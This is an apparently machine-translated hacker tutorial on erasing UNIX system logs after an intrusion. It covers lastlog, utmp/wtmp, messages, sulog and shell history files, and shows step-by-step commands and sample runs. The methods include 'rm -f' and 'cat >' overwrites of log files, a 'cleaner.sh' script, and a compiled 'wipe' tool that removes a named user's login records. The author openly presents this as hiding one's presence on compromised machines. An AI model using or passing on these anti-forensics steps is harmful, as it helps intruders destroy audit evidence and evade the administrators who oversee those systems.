Clear system logs

Because of the wide range of systems involved, it is impossible to clarify the logs of all UNIX-class systems, but most of them are similar. Below I will only use the common SunOS & RedHat for introduction. for other systems, see related information.

UNIX system log files are usually stored in the "/var/log and/var/adm" directory. Generally, you can view syslog. conf to check the log configuration, for example, CAT/etc/syslog. conf.

Under/var/log and/var/adm of SunOS, there is also a link with/usr/ADM as/var/adm.

RedHat is under/var/log and/var/run.

The following is a log sample in Sun os5.7.

# Ls/var/adm

Acct log messages.1 passwd sulog vold. Log

Aculog messages messages.2 SA utmp wtmp

Lastlog messages.0 messages.3 spellhist utmpx wtmpx

# Ls/var/log

Authlog syslog syslog.1 syslog.3

Sysidconfig. Log syslog.0 syslog.2 syslog.4

The following is a log sample in redhat6.2.

# Ls/var/log

Boot. Log dmesg messages.2 secure uucp

Boot. log.1 htmlaccess. Log messages.3 secure.1 wtmp

Boot. log.2 httpd messages.4 secure.2 wtmp.1

Boot. log.3 lastlog netconf. Log secure.3 xferlog

Boot. log.4 mailllog netconf. log.1 secure.4 xferlog.1

Cron maillog netconf. log.2 sendmail. St xferlog.2

Cron.1 maillog.1 netconf. log.3 Spooler xferlog.3

Cron.2 maillog.2 netconf. log.4 spooler.1 xferlog.4

Cron.3 maillog.3 news spooler.2

Cron.4 maillog.4 normal. Log spooler.3

Daily. log messages realtime. Log spooler.4

Daily. Sh messages.1 Samba transfer. Log

# Ls/var/run

ATD. pid gpm. PID klogd. PID random-seed treemenu. Cache

Crond. PID identd. PID netreport runlevel. dir utmp

FTP. PIDs-all inetd. PID news syslogd. PID

Generally, the logs we want to clear include

Lastlog

Utmp (utmpx)

Wtmp (wtmpx)

Messages

Syslog

Sulog

In addition, various shells also record the history of commands used by users. It uses files in the user's main directory to record the history of these commands. Generally, the file name is. sh_history (Ksh ),. history (CSH), or. bash_history (BASH.

Generally, you can erase the above logs .:)

Next I will talk about the relevant information and clearing methods of the above logs. For more detailed information and other logs, please view the relevant information.

First, let's talk about the functions of these logs.-> what does it record?

Lastlog

Lastlog records the last logon time of each user and the initial destination of each user.

When a user logs on to the UNIX system, the registration program searches for the user's uid in the lastlog file. If the program finds the user's uid, UNIX displays the Last Logon Time and tty (terminal number)

The following is an example:

Sunoperating 5.7

Login: Gao

Password:

No directory! Logging in with home =/

Last login: Sun Feb 4 22:18:25 from 211.167.1.24

Sun microsys tems Inc. SunOS 5.7 generic October 1998 $

. Then, register the program to update the lastlog file with the new login time and tty information, and the program will update the utmp wtmp. File.

Utmp

The utmp log records all users logged on to the system. this file is constantly changing as it enters and leaves the system. it also maintains a long history for users in the system. utmp logs are usually stored in/etc/utmp. You can use the W and who commands to view utmp. however, some other commands can also access this file. :) For example, finger users. currently, utmp generally has a utmpx file as a supplement to log records. don't forget to wipe this pp. :)

Wtmp

The wtmp file records user logon and exit events, which are similar to utmp. however, as the number of logins increases, it will become larger and larger. some system ftp access is also recorded in this file. it also records the normal system exit time. you can use the last and AC commands to access it.

Syslog & Messages

By viewing/etc/syslog. conf, we can know what syslog records are .:)

Logs generated by many programs are recorded by them.

It also has a syslogd process to serve it.

In the absence of time, it transfers most of the information to/var/adm/messages

Sulog

Sulog is the log used to switch the USER command Su.

Usually in/var/adm/sulog

If you have run the su command on the machine, do not forget to clear it .:)

Shell record

. Sh_history (Ksh ),. history (CSH), or. bash_history (BASH) is the history of shell execution. record the commands executed by the user. it usually exists in the user's home directory. don't forget to go to the root directory. when I intrude into a machine, I often find hacking records of others. :) so remember to clear it.

1. logs are all text files. the most stupid method is to use a text editor to edit log files and delete related records to wipe footprints and hide their own results.

For example, using vi

However, this is very stupid. It is too troublesome and the workload is too large.

If you have 50 machines to handle, you can see when you are busy.

:)

2. When I first started learning UNIX, I often used Rm-F to delete logs. For example, Rm-F/usr/ADM/lastlog.

Haha

This is stupid.

It is easier for administrators to detect intrusions. However, they are relatively well protected .:)

It can be used on less important machines.

3. Clear with>.

For example:

# Cat>/usr/log/lastlog

-> Enter what you want to write here. It is better to pretend to be something, or leave it blank .:)

^ D-> here ^ d is to press Ctrl + D.

#

If there is no log clearing tool on the battlefield, I usually use this tool to clear it. :)

I would like to find several old logs to overwrite it :)

========================================================== ============================

4. Of course, it is best to use the log clearing tool.

Enter a few commands for the program to help you clean :)

A. Common log clearing tools.

General rootkit packages include z2.c and wted. C.

It is easy to find.

Many online tutorials describe the use of these two tools.

I will not discuss it here. :) save time.

B. Here I provide a script that I used to clear logs for a while.

Cleaner. Sh in huckit.zip

We use it like this

# Chmod 755 cleaner. Sh

#./Cleaner. Sh

Log cleaner v0.5b by: Tragedy/Dor *

* Usage: cleaner. Sh

#./Cleaner. Sh Username

Here, username is the user account you want to clear logs.

:)

For example:

#./Cleaner. Sh Gao

Log cleaner v0.5b by: Tragedy/Dor OS

Detection ....

Detected SunOS

--- <[Log cleaning in process ....

* Cleaning aculog (0 lines)... 0 lines removed!

* Cleaning lastlog (19789 lines)... 45 lines removed!

* Cleaning messages (12 lines)... 1 lines removed!

* Cleaning messages.0 (12 lines)... 0 lines removed!

* Cleaning messages.1 (28 lines)... 0 lines removed!

* Cleaning messages.2 (38 lines)... 0 lines removed!

* Cleaning messages.3 (17 lines)... 0 lines removed!

* Cleaning spellhist (0 lines)... 0 lines removed!

* Cleaning sulog (986 lines)... 6 lines removed!

* Cleaning utmp (179 lines)... 1 lines removed!

* Cleaning utmpx (387 lines)... 1 lines removed!

* Cleaning vold. Log (0 lines)... 0 lines removed!

* Cleaning wtmp (299 lines)... 0 lines removed!

* Cleaning wtmpx (565 lines)... 0 lines removed!

* Cleaning authlog (0 lines)... 0 lines removed!

* Cleaning syslog (53 lines)... 0 lines removed!

* Cleaning syslog.0 (14 lines)... 0 lines removed!

* Cleaning syslog.1 (64 lines)... 0 lines removed!

* Cleaning syslog.2 (39 lines)... 0 lines removed!

* Cleaning syslog.3 (5 lines)... 0 lines removed!

* Cleaning syslog.4 (3 lines)... 0 lines removed!

* Cleaning syslog.5 (210 lines)... 0 lines removed!

#

There is a problem with the/bin/sh script,

That is, you must have the uid = 0 permission. That is, Root.

EUID = 0 does not work properly, and the report permission is insufficient.

Solution:

You can change it #! /Usr/sh suid shell set for you .:)

One advantage of this script is that it does not need to be compiled and can work under multiple systems, such as RedHat SunOS.

You can also use

Cat> clog. Sh

To facilitate copying to the host. FTP is not required for retrieval .:)

There is also a command to clear most of the logs.

This is why I often use it.

But it is too clean to delete the previous records .:(

Sometimes it is not very clean. For example, lastlog. utmp may sometimes fail to be cleared.

So now I usually use two tools to clear logs.

I will introduce it later .:)

Next we will introduce another log cleaner that I think is better .:)

The wipe-1.00.tgz in the huckit.zip.

It can be completely cleared

Lastlog

Utmp

Utmpx

Wtmp

Wtmpx

:)

Next let's take a look. (SunOS 5.7, a demo platform)

# Gzip-D wipe-1.00.tgz

# Tar-XF wipe-1.00.tar

# Cd wipe-1.00

# Ls-Al

Total 32

Drwxr-XR-x 2 root Root 512 February 4 20:48.

Drwxrwxrwx 6 root other 1024 February 4 18:40 ..

-RW-r -- 1 Root 130 1997 January 9 install

-RW-r -- 1 root staff 1389 1997 makefile

-RW-r -- 1 Root 498 1997 January 9 readme

-RW-r -- 1 root staff 10027 1997 wipe. c

# Make

Wipe v0.01!

Usage: 'make' where sys tem types are:

Linux FreeBSD sunos4 solaris2 Ultrix

Aix irix digital bsdi NetBSD HPUX

#

We can see that it needs to show the system options. These options are:

Linux FreeBSD sunos4 solaris2 Ultrix

Aix irix digital bsdi NetBSD HPUX

To clear related system logs, you must compile the logs in the same system.

For example, to compile in linux such as RedHat, it should be: make Linux

Compile FreeBSD to make FreeBSD.

Compile in SunOS 4 to make sunos4.

Compile in a system above SunOS 5 to make solaris2.

Here we use make solaris2

SunOS 5 or above is called Solaris.

# Make solaris2

Gcc-O3-dhave_lastlog_h-dhave_utmpx-o wipe. c

# Ls-Al

Total 94

Drwxr-XR-x 2 root Root 512 February 4 21:03.

Drwxrwxrwx 6 root other 1024 February 4 18:40 ..

-RW-r -- 1 Root 130 1997 January 9 install

-RW-r -- 1 root staff 1389 1997 makefile

-RW-r -- 1 Root 498 1997 January 9 readme

-Rwxr-XR-x 1 root other 30920 February 4 21:03 wipe

-RW-r -- 1 root staff 10027 1997 wipe. c

#./Wipe

Usage: Wipe [uwla] ...... options...

Utmp Editing: erase all usernames: Wipe U [username]

Erase one username on TTY: Wipe U [username] [tty]

Wtmp Editing: erase last entry for user: Wipe W [username]

Erase last entry on TTY: Wipe W [username] [tty] lastlog

Editing: blank lastlog for user: Wipe L [username] alter lastlog

Entry: Wipe L [username] [tty] [time] [host]

Where [time] is in the format [yymmddhhmm]

Acct Editing: erase Acct entries on TTY: wipe a [username] [tty]

You can see how to use the compiled wipe.

The U option is utmp utmpx log erasure ..

The W option is wtmp wtmpx log erasure.

L The option is lastlog log erasure.

A Is/var/adm/pacct log erasure. (This is generally not used .:)

[Tty] indicates the terminal number. It indicates the option to clear logs when multiple identical accounts log on at the same time. Of course, your terminal number is required .:)

You can run the W command to check the terminal number.

For example:

# W

, 1 user, average load: 0.00, 0.00, 0.01

Username terminal number Logon Time idle jcpu pcpu Execute Command

Gao pts/1 3 W

The following is my usage on SunOS 5.7 .:)

# W

, 1 user, average load: 0.00, 0.00, 0.01

Username terminal number Logon Time idle jcpu pcpu Execute Command

Gao pts/1 3 W

#./Wipe U Gao

Patching/var/adm/utmp... done.

Patching/var/adm/utmpx... done.

# W

, 1 user, average load: 0.00, 0.00, 0.01

Username terminal number Logon Time idle jcpu pcpu Execute Command

#./Wipe W Gao

Patching/var/adm/wtmp... done.

Patching/var/adm/wtmpx... done.

#./Wipe l Gao

Patching/var/adm/lastlog... done.

Okay.

Lastlog utmp utmpx wtmp wtmpx is wiped out.

Do you see wipe U Gao?

Why did I run the W command?

Haha

Think about it.

So we usually run wipe U Gao after logging on to the system to hide ourselves .:)

Of course, we should not forget the shell record.

# Ls-Al/. * History

-RW ------- 1 root other 456 20:27. sh_history

# Rm-F. * History

# Cd

# Pwd

/Home/Gao

# Ls-Al/. * History

-RW ------- 1 root other 456 20:27. sh_history

# Rm-F. * History

OK. Add a program to a script and an operation to ensure basic security .:)

Of course, if you have a better understanding of the system, you can find that there is still a problem in this way .:)